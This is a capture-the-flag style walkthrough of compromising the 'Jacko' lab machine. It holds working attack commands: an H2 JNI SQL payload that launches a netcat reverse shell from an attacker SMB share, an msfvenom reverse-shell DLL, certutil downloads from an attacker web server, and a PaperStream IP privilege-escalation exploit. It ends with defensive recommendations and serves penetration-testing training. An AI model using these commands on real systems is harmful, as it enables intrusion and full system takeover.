PG Practice - Jacko Walkthrough
![PG Practice - Jacko Walkthrough](https://alexsecurity.rocks/posts/pgpractice-jacko/offensive_security-logo-black.jpg)
Introduction
This report provides a comprehensive analysis of a penetration test performed on ‘Jacko,’ a designated Windows machine classified as intermediate difficulty from Offensive Security’s PG Practice Labs. The objective of this test was to identify and exploit vulnerabilities within Jacko
, with a focus on understanding the security posture of the system and recommending measures for mitigation and improvement. The scope of this test encompassed various stages of penetration testing, including information gathering, vulnerability assessment, exploitation, and post-exploitation analysis.
The key phases in the methodology included: Information Gathering, which involved acquiring initial information about the target; Service Enumeration, focused on identifying open ports and active services; Vulnerability Identification, aimed at discovering potential vulnerabilities; Initial Access, entailing the exploitation of identified vulnerabilities to gain entry into the system; Post-Compromise Enumeration, which involved acquiring more detailed information after gaining access; and finally, Privilege Escalation, aimed at raising access rights to gain further control.
Reconnaissance
The penetration test commenced with an nmap scan, revealing several open ports. Notably, ports 80 and 8082 were identified as significant: port 80 was hosting a Microsoft IIS server, and port 8082 was serving an H2 Database Engine.
nmap -sCV -p- -T4 -v 192.168.155.66 -oA jacko
Nmap scan report for 192.168.155.66
Host is up (0.057s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: H2 Database Engine (redirect)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
7680/tcp open pando-pub?
8082/tcp open http H2 database http console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
|_http-title: H2 Console
| http-methods:
|_ Supported Methods: GET POST
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-12-05T00:30:20
|_ start_date: N/A
|_clock-skew: -1s
Port 80
During the assessment, the H2 Database Engine interface was accessed via port 80. Although the version of the engine was not immediately discernible, the Quickstart guide revealed a web console on port 8082. Notably, default administrative credentials were found exposed on the Quickstart page, presenting a potential pathway for initial access.
Initial Access
Access to the H2 database web console on port 8082 was achieved using the default credentials. Subsequent investigation revealed that the H2 database was running version 1.4.199. This particular version is known to be vulnerable to a JNI code execution exploit. The vulnerability and its exploitation were detailed by Markus Wulftange and have been documented in a comprehensive blog post.
The critical aspect of this vulnerability lies in its ability to permit the execution of arbitrary Java code on the server, bypassing the need for a Java Compiler. This is achieved by leveraging the Java Native Interface (JNI), which allows for a Java class to be directly loaded into memory. Consequently, this exploit circumvents the typical requirement of having a Java Compiler present on the machine running the H2 database, thus posing a critical security risk.
Exploitation
In the initial phase of exploitation, preparation of the local environment was necessary to intercept the reverse shell. The Impacket’s smbserver.py script was utilized to set up an SMB server. The rationale for this approach was that the SMB server would host the Netcat executable (nc.exe). This executable would then be called by the exploit on the target system.
impacket-smbserver -smb2support tmp /home/kali/pg/jacko
Simultaneously, a Netcat listener was established to capture the reverse connection:
nc -nvlp 8082
With the environment appropriately configured, the next step involved executing the SQL statements.
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.45.154/share/nc.exe -e cmd.exe 192.168.45.154 8082").getInputStream()).useDelimiter("\Z").next()');
The Evaluate script command leveraged the Windows command line to execute nc.exe from the SMB share set up earlier, thereby creating a reverse shell to the listener.
When the target system executed these SQL commands, the nc.exe on the target initiated a connection back to the listener on port 8082. This action resulted in the reception of the shell on the attacking machine, effectively granting access to the target system.
Privilege Escalation
Upon establishing a foothold within the target system, the next objective was to escalate privileges to gain more comprehensive control over the system. Enumeration efforts led to the discovery of a directory named PAPERSTREAM IP within Program Files (x86). Further investigation of this directory revealed a potential vulnerability associated with the PaperStream IP (TWAIN) software.
Identifying the Vulnerability
The specific vulnerability was linked to CVE-2018-16156, a security flaw in PaperStream IP (TWAIN) 1.42.0.5685 (Service Update 7). This vulnerability revolves around the FJTWSVIC
service, which runs with SYSTEM privileges and processes unauthenticated messages over the FjtwMkic_Fjicube_32
named pipe. A critical function within this service attempts to load the UninOldIS.dll
library dynamically and executes its ChangeUninstallString
function. Importantly, the default installation does not include this library, meaning if a DLL with that name is placed in a PATH directory, it could be executed with SYSTEM privileges.
Addressing Environment Variable Issues
During the assessment, difficulties were encountered executing basic system commands like whoami
due to a misconfigured PATH environment variable on the target machine. The PATH variable is essential as it directs the operating system to executable files. If key system directories are missing from PATH, common commands and executables become inaccessible.
To address this, the PATH variable was reset using the following command:
set PATH=%SystemRoot%\system32;%SystemRoot%;
Crafting and Deploying the Exploit
Throughout the course of the assessment, an existing exploit, identified as Exploit-DB (ID: 49382), was identified. To effectively utilize this exploit, a custom DLL payload was first generated using msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.154 LPORT=8082
Preparing for Payload Deployment
It was verified that the user (jacko\tony) had write permissions to the desktop directory, a important factor for placing the payload.
C:\Windows\System32\icacls.exe C:\users\tony\Desktop\
With this confirmation, it was necessary to modify the exploit to point to the payload generated by msfvenom.
Setting Up for the Exploit Execution
In order to execute the exploit, a Python HTTP server was started on the attacker machine. This server hosted both the exploit and the payload.
python3 -m http.server 80
Subsequently, certutil was used to download the exploit script and the payload onto the target machine.
certutil -urlcache -split -f http://192.168.45.154/49382.ps1
certutil -urlcache -split -f http://192.168.45.154/UninOldIS.dll
Gaining SYSTEM Privileges
Finally, a Netcat listener was set up on port 8082 to capture the reverse connection initiated by the exploit.
nc -nvlp 8082
Running the exploit:
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\49382.ps1
Recommendations
Jacko H2 Database Vulnerability
Change Default Credentials: It was observed that the H2 Database could be accessed using default credentials. It is strongly recommended to change these credentials to robust, unique passwords. A strong password should ideally be at least 16 characters long, comprising a mix of alphanumeric and special characters.
Enable Multi-Factor Authentication (MFA): If feasible, implement multi-factor authentication. MFA adds an additional layer of security, making unauthorized access significantly more challenging.
Restrict Access: Limit access to the H2 Database engine strictly to personnel who require it for their work. Implementing access controls will reduce the risk of unauthorized access and potential internal misuse.
Paper StreamIP
Review and Enhance Patch Management Policies: It is crucial to establish a robust patch management process not only for PaperStream but for all software used within the environment. This process should ensure that all software, including PaperStream, is regularly updated to the latest versions. Timely application of patches is key in protecting against known vulnerabilities. Regular reviews of these policies will help maintain an effective defense against emerging threats.
Sharing is caring!